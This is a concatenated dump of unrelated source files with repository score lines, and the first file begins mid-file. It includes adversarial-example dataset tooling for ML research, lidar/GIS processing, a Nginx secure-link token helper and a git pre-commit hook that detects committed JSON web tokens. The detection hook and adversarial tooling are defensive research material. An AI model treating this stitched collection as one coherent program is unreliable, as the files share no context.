utils.save_zip(approximation_dataset, approximation_dataset_path)
@approximation_dataset.command(name='model')
@options.global_options
@options.dataset_options('train', 'train')
@options.standard_model_options
@options.custom_model_options
@options.adversarial_dataset_options
@options.approximation_dataset_options('model')
def approximation_dataset_model(options):
adversarial_loader = options['adversarial_loader']
approximation_dataset_path = options['approximation_dataset_path']
custom_foolbox_model = options['custom_foolbox_model']
genuine_loader = options['loader']
genuine_approximation_dataset = training.generate_approximation_dataset(custom_foolbox_model, genuine_loader, 'Genuine Approximation Dataset')
adversarial_approximation_dataset = training.generate_approximation_dataset(custom_foolbox_model, adversarial_loader, 'Adversarial Approximation Dataset')
approximation_dataset = genuine_approximation_dataset + adversarial_approximation_dataset
utils.save_zip(approximation_dataset, approximation_dataset_path)
@approximation_dataset.command(name='rejector')
@options.global_options
@options.dataset_options('train', 'train')
@options.standard_model_options
@options.pretrained_model_options
@options.distance_options
@options.counter_attack_options(False)
@options.detector_options
@options.rejector_options
@options.adversarial_dataset_options
@options.approximation_dataset_options('rejector')
def approximation_dataset_rejector(options):
adversarial_loader = options['adversarial_loader']
approximation_dataset_path = options['approximation_dataset_path']
foolbox_model = options['foolbox_model']
genuine_loader = options['loader']
rejector = options['rejector']
defended_model = rejectors.RejectorModel(foolbox_model, rejector)
genuine_approximation_dataset = training.generate_approximation_dataset(defended_model, genuine_loader, 'Genuine Approximation Dataset')
adversarial_approximation_dataset = training.generate_approximation_dataset(defended_model, adversarial_loader, 'Adversarial Approximation Dataset')
approximation_dataset = genuine_approximation_dataset + adversarial_approximation_dataset
utils.save_zip(approximation_dataset, approximation_dataset_path)
| 2.34375 | 2 |
kite-python/kite_ml/kite/utils/reduce.py | kiteco/kiteco-public | 17 | 12795726 | <filename>kite-python/kite_ml/kite/utils/reduce.py<gh_stars>10-100
import tensorflow as tf
def is_empty(x: tf.Tensor) -> tf.Tensor:
return tf.equal(tf.reduce_sum(tf.shape(x)), 0)
def safe_reduce_mean(x: tf.Tensor, value: float, name: str) -> tf.Tensor:
# need conditional in case the tensor is empty to avoid nans
with tf.name_scope('{}_safe_mean'.format(name)):
return tf.cond(
is_empty(x),
true_fn=lambda: value, false_fn=lambda: tf.reduce_mean(x), name=name,
) | 2.765625 | 3 |
clean_purchase.py | MasonDMitchell/HackNC-2019 | 0 | 12795727 | import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
import scipy as sci
import pandas as pd
import numbers
import csv
import sys
filepath = sys.argv[1]
filename = filepath[filepath.rfind('/')+1:]
print(filepath)
data = pd.read_csv(filepath)
print("Adding year column")
data['year'] = data.apply(lambda row: str(row.QREDATE)[-6:-2], axis=1)
print("Adding month column")
data['month'] = data.apply(lambda row: str(row.QREDATE)[-10:-8].lstrip('0'), axis=1)
print("Adding day column")
data['day'] = data.apply(lambda row: str(row.QREDATE)[-8:-6].lstrip('0'), axis=1)
print('Removing invalid users')
invalid_users = []
users = data.NEWID.unique()
for user in users:
user_data = data.loc[data['NEWID'] == user]
#Finding invalid users by determining if their QREDATE is invalid
invalid = user_data.loc[user_data['QREDATE_'] == 'B']
if len(invalid) > 0:
invalid_users.append(user)
data = data[data.NEWID != user]
invalid2 = user_data.loc[user_data.year == 'n']
if len(invalid2) > 0 and user not in invalid_users:
invalid_users.append(user)
data = data[data.NEWID != user]
print("Mapping UCC to Category")
uccdata = pd.read_csv("categorized_ucc_dictionary.csv")
data['category'] = data['UCC'].map(uccdata.set_index('UCC')['CATEGORY'])
print("Dropping unneeded columns")
data = data.drop(columns=["UCC","ALLOC","GIFT","PUB_FLAG","QREDATE","QREDATE_"],axis=1)
data.to_csv('clean_data/'+filename,index=False)
| 2.9375 | 3 |
lidar_to_DEM_functions.py | xaviernogueira/gcs_gui | 4 | 12795728 | import arcpy
from arcpy import env
from arcpy.sa import *
import file_functions
from file_functions import *
import create_centerline
import create_station_lines
from create_station_lines import create_station_lines_function
import os
from os import listdir
from os.path import isfile, join
import xlrd
import shutil
from openpyxl.workbook import Workbook
from openpyxl.reader.excel import load_workbook, InvalidFileException
def lidar_footptint(lasbin, lidardir, spatialref_shp):
"""This function converts LAZ files to LAS file format as well as producing a LiDAR extent polygon.
in_folder must be a directory containing nothing but raw LAZ files
spatial_ref must be an ArcGIS spatial reference object with units of feet.
las_tools_bin must be the location of the 'bin' folder installed with LAStools by rapidlasso
Returns: A shapefile w/ LiDAR coverage to be used to make a ground polygon for LAStools processing"""
files_in_direct = [f for f in listdir(lidardir) if isfile(join(lidardir, f))]
laspath = lidardir + '\\las_files'
if not os.path.exists(laspath):
os.makedirs(laspath)
# Initiate temp files folder formatted for LAStools
temp_files = lidardir + '\\temp_files'
if not os.path.exists(temp_files):
os.makedirs(temp_files)
in_spatial_ref = arcpy.Describe(spatialref_shp).spatialReference
try:
# Convert laz files to LAS files
for f in files_in_direct:
if f[-4:] == ".laz":
# Correct format, can alter between browse() input and default
if lasbin[-1] != 'n':
lasbin = lasbin[:-1]
cmd("%s\\laszip.exe -i %s\\%s -o %s\\%s_noprj.las" % (lasbin, lidardir, f, laspath, f[:-4]))
print("%s\\laszip.exe -i %s\\%s -o %s\\%s_noprj.las" % (lasbin, lidardir, f, laspath, f[:-4]))
cmd("%s\\las2las.exe -i %s\\%s_noprj.las -o %s\\%s.las" % (lasbin, laspath, f[:-4], laspath, f[:-4]))
print("%s\\las2las.exe -i %s\\%s_noprj.las -o %s\\%s.las" % (lasbin, laspath, f[:-4], laspath, f[:-4]))
files_in_laspath = [f for f in listdir(laspath) if isfile(join(laspath, f))]
# Delete unnecessary index files
for f in files_in_laspath:
if f[-4:] == 'lasx':
os.remove(laspath + "\\%s" % f)
if f[-5] == 'j':
os.remove(laspath + "\\%s" % f)
raw_las_dataset = arcpy.CreateLasDataset_management(laspath, lidardir + "\\raw_las_dataset.lasd",
spatial_reference=in_spatial_ref, compute_stats=True)
lidar_ras = CreateConstantRaster(1, extent=raw_las_dataset)
lidar_footprint = arcpy.RasterToPolygon_conversion(lidar_ras, lidardir + '\\las_footprint.shp')
except arcpy.ExecuteError:
print(arcpy.GetMessages())
return lidar_footprint
def define_ground_polygon(lidar_footprint, lidardir, naipdir, ndvi_thresh, aoi_shp):
"""This function takes the defined lidar footprint from the lidar_footprint() function, as well as a defined NAIP imagery location (in .jpg2)
and makes a polygon of vegeation using a NDVI threshold of >0.4. This polygon is erased from the lidar footprint to give a ground_polygon used
to define processing settings"""
# Set processing extent to the LiDAR data extent
arcpy.env.extent = lidar_footprint
in_spatial_ref = arcpy.Describe(lidar_footprint).spatialReference
# Find NAIP imagery in folder
naip_imagery = [f for f in listdir(naipdir) if isfile(join(naipdir, f))]
# Initiate temp files folder
temp_files = lidardir + '\\temp_files'
if not os.path.exists(temp_files):
os.makedirs(temp_files)
if len(naip_imagery) > 1:
add_to_mosaic = [naipdir + "\\" + f for f in naip_imagery]
naip_imagery = arcpy.MosaicToNewRaster_management(add_to_mosaic, output_location=lidardir,
raster_dataset_name_with_extension="NAIP_mos.tif",
coordinate_system_for_the_raster=in_spatial_ref,
number_of_bands=4)
else:
naip_imagery = (naipdir + "\\%s" % naip_imagery[0])
naip_imagery = arcpy.ProjectRaster_management(naip_imagery, lidardir + "\\NAIP_prj.tif", in_spatial_ref)
try:
# Extract bands 1 (red) and 4 (NIR)
red_lyr = arcpy.MakeRasterLayer_management(naip_imagery, temp_files + "\\rd_lyr", band_index=0)
nir_lyr = arcpy.MakeRasterLayer_management(naip_imagery, temp_files + "\\nr_lyr", band_index=4)
red_lyr = arcpy.SaveToLayerFile_management(red_lyr, temp_files + "\\red_ras.lyr")
nir_lyr = arcpy.SaveToLayerFile_management(nir_lyr, temp_files + "\\nir_ras.lyr")
red_ras = arcpy.CopyRaster_management(red_lyr, temp_files + "\\red_ras.tif", format="TIFF")
nir_ras = arcpy.CopyRaster_management(nir_lyr, temp_files + "\\nir_ras.tif", format="TIFF")
red_ras = Raster(red_ras)
nir_ras = Raster(nir_ras)
# Calculate ndvi and generate polygon delineating values > ndvi_thresh
ndvi = lidardir + "\\NDVI.tif"
ndvi_ras = ((nir_ras - red_ras) / (nir_ras + red_ras))
ndvi_ras.save(ndvi)
veg_ras_raw = Con(arcpy.sa.Raster(ndvi) >= ndvi_thresh, 1)
veg_ras_raw.save(temp_files + "\\veg_ras_raw.tif")
veg_ras = MajorityFilter(veg_ras_raw, "EIGHT", "MAJORITY")
veg_ras.save(temp_files + "\\veg_ras.tif")
        veg_poly = arcpy.RasterToPolygon_conversion(veg_ras, lidardir + "\\veg_poly_ndvi.shp", simplify=False)
# Make polygon representing bare ground
if aoi_shp != '':
ground_poly = arcpy.Erase_analysis(lidar_footprint, veg_poly, temp_files + "\\ground_poly_full.shp")
aoi_prj = arcpy.Project_management(aoi_shp, temp_files + "\\aoi_prj_to_inref.shp",
out_coor_system=in_spatial_ref)
ground_poly = arcpy.Clip_analysis(ground_poly, aoi_prj, lidardir + "\\ground_poly.shp")
else:
ground_poly = arcpy.Erase_analysis(lidar_footprint, veg_poly, lidardir + "\\ground_poly.shp")
ground_poly = arcpy.DefineProjection_management(ground_poly, in_spatial_ref)
print("AOI bare-ground polygon @ %s" % ground_poly)
except arcpy.ExecuteError:
print(arcpy.GetMessages())
def lidar_to_raster(lidardir, spatialref_shp, aoi_shp, sample_meth, tri_meth, void_meth, m_cell_size=1):
"""Converts processed LAS files to a LAS dataset, and then to a raster with cell size of 1m
Args: Folder containing LAS files, desired cell size in meters (default is 1m), and ft spatial reference
Returns: Raster name for use in detrending """
# Create variables with relevant folders
lasdir = lidardir + '\\las_files'
ground_lasdir = lasdir + '\\09_ground_rm_duplicates'
# Create addresses for generated .lasd, .tiff files
out_dem = lidardir + "\\las_dem.tif"
out_las = lasdir + '\\las_dataset.lasd'
# Initiate temp files folder
temp_files = lidardir + '\\temp_files'
if not os.path.exists(temp_files):
os.makedirs(temp_files)
# Set up output spatial reference and convert units if necessary
in_spatial_ref = arcpy.Describe(spatialref_shp).spatialReference
out_spatial_ref = arcpy.Describe(aoi_shp).spatialReference
if in_spatial_ref.linearUnitName == 'Meter':
cell_size = m_cell_size
print('LAS units are Meters')
elif in_spatial_ref.linearUnitName == 'Foot_US':
cell_size = (3.28 * m_cell_size)
print('LAS units are Feet')
else:
        return print('Linear unit name for %s uncertain, please use a PROJECTED COORDINATE SYSTEM' % in_spatial_ref.name)
# Set up interpolation method string
if sample_meth == 'BINNING':
method_str = '%s AVERAGE %s' % (sample_meth, void_meth)
else:
method_str = "%s %s NO_THINNING MAXIMUM 0" % (sample_meth, tri_meth)
print('Methods: %s' % method_str)
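    # For reference, the assembled string looks like "BINNING AVERAGE <void_meth>" (e.g. "BINNING AVERAGE LINEAR")
    # or "<sample_meth> <tri_meth> NO_THINNING MAXIMUM 0" (e.g. "TRIANGULATION NATURAL_NEIGHBOR NO_THINNING MAXIMUM 0"),
    # i.e. the interpolation_type syntax passed to arcpy.LasDatasetToRaster_conversion below; the example method names are illustrative.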
try:
no_prj_dem = temp_files + '\\noprj_dem.tif'
las_dataset = arcpy.CreateLasDataset_management(ground_lasdir, out_las, spatial_reference=in_spatial_ref,
compute_stats=True)
lidar_raster = arcpy.LasDatasetToRaster_conversion(las_dataset, value_field='ELEVATION', data_type='FLOAT',
interpolation_type=method_str, sampling_type='CELLSIZE',
sampling_value=cell_size)
arcpy.CopyRaster_management(lidar_raster, no_prj_dem)
arcpy.ProjectRaster_management(no_prj_dem, out_raster=out_dem, out_coor_system=out_spatial_ref)
except arcpy.ExecuteError:
print(arcpy.GetMessages())
print("LAS -> DEM output @ %s" % out_dem)
# Notify the user which units the DEM are in
if out_spatial_ref.linearUnitName == 'Meter':
print('DEM units are Meters')
elif out_spatial_ref.linearUnitName == 'Foot_US':
print('DEM units are Feet')
else:
        print('Linear unit name for %s uncertain, please use a PROJECTED COORDINATE SYSTEM' % out_spatial_ref.name)
return out_dem
def detrend_prep(dem, flow_poly, aoi_shp, filt_passes, smooth_dist, m_spacing=1, centerline_verified=False):
"""This function takes the Lidar raster, creates a least-cost thalweg centerline from a smoothed raster. Station points are
generated along the centerline at defined spacing (1/20th of channel width is a starting point) which are given the values of the lidar raster.
    Args: dem raster, upstream flow polygon, AOI shapefile, number of low-pass filter passes, smoothing distance, and station point spacing in meters (1m is default).
Run first with centerline_verified=False and visually inspect. Run again w/ True to return the [station_points, elevation_table]"""
# Set up environment and output folder
spatial_ref = arcpy.Describe(aoi_shp).spatialReference
arcpy.env.extent = dem
dem_dir = os.path.dirname(dem)
# Initiate temp files folder
temp_files = dem_dir + '\\temp_files'
if not os.path.exists(temp_files):
os.makedirs(temp_files)
# Define input parameters
params = [m_spacing,
smooth_dist] # First item defines XS length and spacing, second item described smoothing distance
if not spatial_ref.linearUnitName == 'Meter':
params = [int(i * 3) for i in params]
filt_passes = int(filt_passes)
if not centerline_verified:
print('Generating smooth thalweg centerline...')
print("Smoothing DEM w/ %sx low pass filters..." % filt_passes)
ticker = 0
filter_out = arcpy.sa.Filter(dem, "LOW")
filter_out.save(temp_files + "\\filter_out%s" % ticker)
while ticker < filt_passes: # Apply an iterative low pass filter 15x to the raster to smooth the topography
filter_out = arcpy.sa.Filter((temp_files + "\\filter_out%s" % ticker), "LOW")
filter_out.save(temp_files + "\\filter_out%s" % (ticker + 1))
ticker += 1
smooth_ras = (dem_dir + "\\filt_ras.tif")
filter_out.save(dem_dir + "\\filt_ras.tif")
# Create least cost centerline from 15x filtered raster
print("Smoothed DEM made, least-cost centerline being calculated...")
lidar_foot = dem_dir + '\\las_footprint.shp'
create_centerline.make_centerline(smooth_ras, aoi_shp, lidar_foot, flow_poly, smooth_distance=10)
for ticker in range(filt_passes + 1): # Delete intermediate filtered rasters
file = (temp_files + "\\filter_out%s" % ticker)
if os.path.exists(file):
try:
shutil.rmtree(file)
except:
print("Could not remove %s " % file)
else:
print("Path %s does not exist and can't be deleted...")
print('Done')
else:
print('Generating thalweg elevation profile...')
centerline = dem_dir + "\\thalweg_centerline.shp"
# Define location of intermediate files, some of which will be deleted
intermediates = ["thalweg_centerline_XS.shp", 'thalweg_station_points.shp', 'thalweg_station_points1.shp',
'sp_elevation_table.dbf']
intermediates = [temp_files + '\\%s' % i for i in intermediates]
# Create a station point shapefile evenly sampling the thalweg centerline
station_lines = create_station_lines.create_station_lines_function(centerline, spacing=params[0],
xs_length=params[0])
station_points = arcpy.Intersect_analysis([intermediates[0], centerline], out_feature_class=intermediates[2],
join_attributes="ALL", output_type="POINT")
station_points = arcpy.MultipartToSinglepart_management(station_points, intermediates[1])
station_points = arcpy.AddXY_management(station_points)
# Extract elevation values from each station point, and export to a .csv file
elevation_table = arcpy.ExtractValuesToTable_ga(station_points, in_rasters=dem, out_table=intermediates[3])
station_points = arcpy.JoinField_management(station_points, in_field="ORIG_FID", join_table=elevation_table,
join_field="SrcID_Feat", fields=["Value"])
# Add fields to override, but first adjust detrending functions
elevation_table = dem_dir + '\\xyz_elevation_table.csv'
elevation_table = file_functions.tableToCSV(input_table=station_points, csv_filepath=elevation_table,
fld_to_remove_override=['FID_thal_1', 'Id_1', 'InLine_FID',
'ORIG_FID'], keep_fields=[])
elevation_df = pd.read_csv(elevation_table)
# Flip rows if upside down
max_loc = elevation_df['LOCATION'].max()
elevation_df.sort_values('LOCATION', inplace=True)
if elevation_df.iloc[0]['Value'] < elevation_df.iloc[-1]['Value']:
loc_list = elevation_df.loc[:, ['LOCATION']].squeeze().to_list()
loc_np = np.array([int(max_loc - i) for i in loc_list])
elevation_df['LOCATION'] = loc_np
elevation_df.sort_values('LOCATION', inplace=True)
elevation_df.to_csv(elevation_table)
# Delete extra files
for j in intermediates[2:]:
delete_gis_files(j)
print("Thalweg elevation profile (.csv) @ %s " % str(elevation_table))
print('Done')
return elevation_table
| 2.25 | 2 |
helper/make_url_secure.py | xei/image-server | 0 | 12795729 | <reponame>xei/image-server
import base64
import hashlib
def generate_url_token(url, secret_key):
md5_digest = hashlib.md5(
("%s %s" % (url, secret_key)).encode("utf-8")
).digest()
base64_encoded = base64.b64encode(md5_digest).decode("utf-8")
# Make the key look like Nginx expects.
token = base64_encoded.replace('+', '-').replace('/', '_').rstrip('=')
return token
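# Note (assumption, not part of this repo): this token scheme is meant to pair with Nginx's
# secure_link / secure_link_md5 directives, e.g.
#   secure_link $arg_token;
#   secure_link_md5 "<expression that reproduces exactly the same '<url> <secret_key>' string hashed above>";
# Nginx md5-hashes that expression and base64url-encodes it without padding, which is what the
# replace('+', '-').replace('/', '_').rstrip('=') transformation above mirrors.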
def make_url_secure(url, secret_key):
token = generate_url_token(url, secret_key)
return "%s?token=%s" % (url, token)
def main():
SECRET_KEY = "MY_SECRET_KEY"
image_url = "https://img.example.com/img/nowm/watermark.png"
secure_url = make_url_secure(image_url, SECRET_KEY)
print(secure_url)
main() | 2.78125 | 3 |
python_demo_v4_cookbook/data_structure/expand_sequence_one_by_one.py | renhongl/python_demo | 1 | 12795730 |
p = (4, 5)
x, y = p
print(x, y)
data = ['ACMD', 50, 90.1, (2012, 11, 12)]
name, shares, price, date = data
print(name, shares, date)
| 2.765625 | 3 |
train_keras.py | gangeshwark/RareEntityPrediction | 0 | 12795731 | from model_new.config import Config
from model_new.keras_model import KerasModel
from model_new.utils import load_json
config = Config()
model = KerasModel(config)
train_set = load_json('dataset/train.json')
# dev_set = load_json('dataset/dev.json')
# sub_set = dev_set[:config.batch_size * 50]
model.train(train_set, None, None)
| 2.25 | 2 |
Standings/urls.py | pawelad/BLM | 1 | 12795732 | from django.conf.urls import patterns, url
from Standings import views
urlpatterns = patterns(
'',
# ex: /standings/
url(r'^$', views.standings_index, name='index'),
) | 1.53125 | 2 |
.githooks/pre-commit-python.py | eshepelyuk/gloo | 3,506 | 12795733 | #!/usr/bin/python3
# This script runs whenever a user tries to commit something in this repo.
# It checks the commit for any text that resembled an encoded JSON web token,
# and asks the user to verify that they want to commit a JWT if it finds any.
import sys
import subprocess
import re
import base64
import binascii
import unittest
# run test like so:
# (cd .githooks/; python -m unittest pre-commit-python.py)
class TestStringMethods(unittest.TestCase):
def test_jwts(self):
self.assertTrue(contains_jwt(["<KEY>"]))
self.assertTrue(contains_jwt(["<KEY>"]))
def test_ok(self):
self.assertFalse(contains_jwt(["test test"]))
self.assertFalse(contains_jwt(["thisisnotajwteventhoughitisalongstring"]))
def contains_jwt(lines):
jwtPattern = re.compile('JWT|iat|name|sub|alg|exp|k')
raiseIssue = False
for line in lines:
# try to find long (20+ character) words consisting only of valid JWT characters
longTokens = re.findall("[A-Za-z0-9_=-]{20,}", line)
        # try to decode any found tokens and see if they look like a JSON fragment
        # where "look like a JSON fragment" is defined as "contains any of the words in the 'jwtPattern' regex pattern"
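        # e.g. a decoded JWT header fragment typically looks like {"typ":"JWT","alg":"HS256"},
        # which contains "JWT" and "alg" and therefore matches jwtPattern above.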
for token in longTokens:
try:
# python's base64 decoder fails if padding is missing; but does not fail if there's
# extra padding; so always add padding
utfOut = base64.urlsafe_b64decode(token+'==').decode("utf-8")
match = jwtPattern.search(utfOut)
if match:
print("Probable JWT found in commit: " + token + " gets decoded into: " + utfOut)
raiseIssue = True
# be very specific about the exceptions we ignore:
except (UnicodeDecodeError, binascii.Error) as e:
continue
return raiseIssue
def main():
#get git diff lines
lines = subprocess.check_output(['git', 'diff', '--staged']).decode("utf-8").split('\n')
# filter out short lines and lines that don't begin with a '+' to only
# test longer, newly added text
filteredLines = list(filter(lambda line : len(line) > 20 and line[0] == '+', lines))
# found a likely JWT, send user through prompt sequence to double check
if contains_jwt(filteredLines):
prompt = "This commit appears to add a JSON web token, which is often accidental and can be problematic (unless it's for a test). Are you sure you want to commit these changes? (y/n): "
failCount = 0
while True:
inputLine = input(prompt).lower()
if len(inputLine) > 0 and inputLine[0] == 'y':
print("OK, proceeding with commit")
return 0
elif len(inputLine) > 0 and inputLine[0] == 'n':
print("Aborting commit")
return 1
elif failCount == 0:
prompt = "Please answer with 'y' or 'n'. Do you wish to proceed with this commit?: "
elif failCount == 1:
prompt = "That's still neither a 'y' nor an 'n'. Do you wish to proceed with this commit?: "
else:
prompt = "You've entered an incorrect input " + str(failCount) + " times now. Please respond with 'y' or 'n' (sans apostrophes) regarding whether or not you wish to proceed with this commit which possibly contains a JWT: "
failCount += 1
else:
print("No likely JWTs found, proceeding with commit")
return 0
if __name__ == "__main__":
sys.exit(main())
| 3.0625 | 3 |
lltk/corpus/fanfic/fanfic.py | literarylab/lltk | 5 | 12795734 | import os
import lltk
from lltk.text.text import Text
from lltk.corpus.corpus import Corpus
class TextFanFic(Text):
pass
class FanFic(Corpus):
TEXT_CLASS=TextFanFic
def compile(self,**attrs):
"""
This is a custom installation function. By default, it will simply try to download itself,
unless a custom function is written here which either installs or provides installation instructions.
"""
return self.download(**attrs)
def load_metadata(self,*x,**y):
"""
Magic attribute loading metadata, and doing any last minute customizing
"""
meta=super().load_metadata()
meta['genre']='FanFiction'
if 'published' in meta.columns:
meta['year']=meta['published'].apply(lambda x: x.split('/')[-1])
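            # two-digit years whose first digit is below 5 (i.e. '00'-'49') are mapped to 20xx below, the rest to 19xx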
meta['year']=meta['year'].apply(lambda y: int('20'+str(y)) if int(str(y)[0])<5 else int('19'+str(y)))
if 'username' in meta.columns:
meta['author']=meta['username']
return meta
| 2.953125 | 3 |
legacy/src/python/etriTools.py | seu0313/Bad-word-filter | 0 | 12795735 | <gh_stars>0
#-*- coding:utf-8 -*-
import os
import json
import base64
import urllib3
BASE_DIR = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
def transcribe_etri(audio_file_path: str):
"""ETRI 음성처리 모듈입니다. 오디오 파일을 받으면 음성을 인식한 후 `한국어` 텍스트 데이터를 반환합니다.
@status `Accepted` \\
@params `"~/src/python/temp2.wav"` \\
@returns `Response data(str) || -1` """
etri_json_file = os.path.join(BASE_DIR, "deep/etri.json")
etri_key = json.loads(open(etri_json_file).read())
access_key = etri_key["private_key"]
open_api_URL = "http://aiopen.etri.re.kr:8000/WiseASR/Recognition"
language_code = "korean"
file = open(audio_file_path, "rb")
audio_contents = base64.b64encode(file.read()).decode("utf8")
file.close()
request_json = {
"access_key": access_key,
"argument": {
"language_code": language_code,
"audio": audio_contents
}
}
http = urllib3.PoolManager()
    try:
        res = http.request(
            "POST",
            open_api_URL,
            headers={"Content-Type": "application/json; charset=UTF-8"},
            body=json.dumps(request_json)
        )
        response_json = json.loads(res.data.decode("utf-8"))
        response = response_json['return_object']['recognized']
    except KeyError:
        # On failure the API reports a "reason" field instead of "return_object".
        response = response_json['reason']
    except Exception:
        # Network or decoding failure: signal it with -1, as documented above.
        response = -1
    return response
if __name__ == "__main__":
audio_file_path = os.path.join(BASE_DIR, "src/python/hello.wav")
response = transcribe_etri(audio_file_path)
    print(response) # Hello, have a wonderful day today (the expected transcription) | 2.984375 | 3 |
custos-client-sdks/custos-python-sdk/custos/samples/tenant_management_samples.py | hasithajayasundara/airavata-custos | 10 | 12795736 | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging
from custos.clients.tenant_management_client import TenantManagementClient
from custos.clients.super_tenant_management_client import SuperTenantManagementClient
from custos.clients.identity_management_client import IdentityManagementClient
from custos.transport.settings import CustosServerClientSettings
import custos.clients.utils.utilities as utl
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
# create console handler with a higher log level
handler = logging.StreamHandler()
handler.setLevel(logging.DEBUG)
custos_settings = CustosServerClientSettings()
# load APIServerClient with default configuration
client = TenantManagementClient(custos_settings)
admin_client = SuperTenantManagementClient(custos_settings)
id_client = IdentityManagementClient(custos_settings)
token = utl.get_token(custos_settings)
def create_tenant():
contacts = ["2345634324"]
redirect_uris = ["http://localhost:8080,http://localhost:8080/user/external_ids"]
response = client.create_admin_tenant("SAMPLE",
"<EMAIL>", "First Name", "LastName", "email", "admin",
"1234",
contacts, redirect_uris, "https://domain.org/",
"openid profile email org.cilogon.userinfo", "domain.org",
"https://domain.org/static/favicon.png", "Galaxy Portal")
print(response)
def get_tenant():
client_id = "custos-8p4baddxvbiusmjorjch-10000401"
response = client.get_tenant(client_token=token, client_id=client_id)
print(response)
def update_tenant():
client_id = "custos-6nwoqodstpe5mvcq09lh-10000101"
contacts = ["8123915386"]
redirect_uris = ["https://custos.scigap.org/callback ", "http://127.0.0.1:8000/auth/callback/",
"http://127.0.0.1:8000/"]
response = client.update_tenant(token, client_id, "Custos Portal",
"<EMAIL>", "Isuru", "Ranawaka", "<EMAIL>", "isjarana",
"Custos1234",
contacts, redirect_uris, "https://custos.scigap.org/",
"openid profile email org.cilogon.userinfo", "domain.org",
"https://custos.scigap.org/", "Custos Portal")
print(response)
def add_tenant_roles():
roles = [{"name": "testing", "composite": False, "description": "testing realm"}]
response = client.add_tenant_roles(token, roles, False)
print(response)
def add_protocol_mapper():
response = client.add_protocol_mapper(token, "phone_atr", "phone", "phone", "STRING", "USER_ATTRIBUTE", True, True,
True, False, False)
print(response)
def get_child_tenants():
response = client.get_child_tenants(token, 0, 5, "ACTIVE")
print(response)
def get_all_tenants():
response = admin_client.get_all_tenants(token, 0, 5, "ACTIVE")
print(response)
def delete_tenant():
response = client.delete_tenant(token, "<PASSWORD>-pv<PASSWORD>ps<PASSWORD>t-10000000")
print(response)
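# A minimal sketch of running one of the samples above; which sample to call is an
# arbitrary choice for illustration.
if __name__ == "__main__":
    get_child_tenants()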
| 1.726563 | 2 |
pyspark_config/yamlConfig/config.py | Patrizio1301/pyspark-config | 0 | 12795737 | <reponame>Patrizio1301/pyspark-config
"""This module implements abstract config class."""
from abc import ABCMeta
from dataclasses import dataclass
from pathlib import Path
from typing import (Any, Union, Type, Optional)
import yaml
import os
import warnings
from future.utils import raise_from
from enum import Enum
from marshmallow import post_load, Schema
from pyspark_config.errors import *
from dataclasses_json import DataClassJsonMixin
from dataclasses_json.cfg import config
from dataclasses_json.mm import (SchemaType, build_schema, schema)
from dataclasses_json.undefined import Undefined
from dataclasses_json.utils import (_undefined_parameter_action_safe, _get_type_cons,
_handle_undefined_parameters_safe,
_is_collection, _is_mapping, _is_new_type,
_is_optional, _issubclass_safe, CatchAllVar)
from dataclasses_json.core import (_user_overrides_or_exts, get_type_hints,
_decode_letter_case_overrides,
_is_supported_generic,
_support_extended_types,
_decode_dict_keys, _ExtendedEncoder,
_decode_generic,
_decode_items)
from dataclasses_json.api import A
from dataclasses import (MISSING,
fields,
is_dataclass # type: ignore
)
Json = Union[dict, list, str, int, float, bool, None]
from pyspark_config.yamlConfig import create_file_path_field, build_path
def build_schema(cls: Type[A],
mixin,
infer_missing,
partial) -> Type[SchemaType]:
Meta = type('Meta',
(),
{'fields': tuple(field.name for field in fields(cls)
if
field.name != 'dataclass_json_config' and field.type !=
Optional[CatchAllVar]),
# TODO #180
# 'render_module': global_config.json_module
})
@post_load
def make_instance(self, kvs, **kwargs):
return _decode_dataclass(cls, kvs, partial)
def dumps(self, *args, **kwargs):
if 'cls' not in kwargs:
kwargs['cls'] = _ExtendedEncoder
return Schema.dumps(self, *args, **kwargs)
def dump(self, obj, *, many=None):
dumped = Schema.dump(self, obj, many=many)
# TODO This is hacky, but the other option I can think of is to generate a different schema
# depending on dump and load, which is even more hacky
# The only problem is the catch all field, we can't statically create a schema for it
# so we just update the dumped dict
if many:
for i, _obj in enumerate(obj):
dumped[i].update(
_handle_undefined_parameters_safe(cls=_obj, kvs={},
usage="dump"))
else:
dumped.update(_handle_undefined_parameters_safe(cls=obj, kvs={},
usage="dump"))
return dumped
schema_ = schema(cls, mixin, infer_missing)
DataClassSchema: Type[SchemaType] = type(
f'{cls.__name__.capitalize()}Schema',
(Schema,),
{'Meta': Meta,
f'make_{cls.__name__.lower()}': make_instance,
'dumps': dumps,
'dump': dump,
**schema_})
return DataClassSchema
@dataclass
class DataClassJsonMix(DataClassJsonMixin):
@classmethod
def schema(cls: Type[A],
*,
infer_missing: bool = False,
only=None,
exclude=(),
many: bool = False,
context=None,
load_only=(),
dump_only=(),
partial: bool = False,
unknown=None) -> SchemaType:
Schema = build_schema(cls, DataClassJsonMix, infer_missing, partial)
if unknown is None:
undefined_parameter_action = _undefined_parameter_action_safe(cls)
if undefined_parameter_action is not None:
# We can just make use of the same-named mm keywords
unknown = undefined_parameter_action.name.lower()
return Schema(only=only,
exclude=exclude,
many=many,
context=context,
load_only=load_only,
dump_only=dump_only,
partial=partial,
unknown=unknown)
@classmethod
def from_dict(cls: Type[A],
kvs: Json,
*,
infer_missing=False) -> A:
return _decode_dataclass(cls, kvs, infer_missing)
def dataclass_json(_cls=None, *, letter_case=None,
undefined: Optional[Union[str, Undefined]] = None):
"""
Based on the code in the `dataclasses` module to handle optional-parens
decorators. See example below:
@dataclass_json
@dataclass_json(letter_case=Lettercase.CAMEL)
class Example:
...
"""
def wrap(cls):
return _process_class(cls, letter_case, undefined)
if _cls is None:
return wrap
return wrap(_cls)
def _process_class(cls, letter_case, undefined):
if letter_case is not None or undefined is not None:
cls.dataclass_json_config = config(letter_case=letter_case,
undefined=undefined)[
'dataclasses_json']
cls.to_json = DataClassJsonMix.to_json
# unwrap and rewrap classmethod to tag it to cls rather than the literal
# DataClassJsonMixin ABC
cls.from_json = classmethod(DataClassJsonMix.from_json.__func__)
cls.to_dict = DataClassJsonMix.to_dict
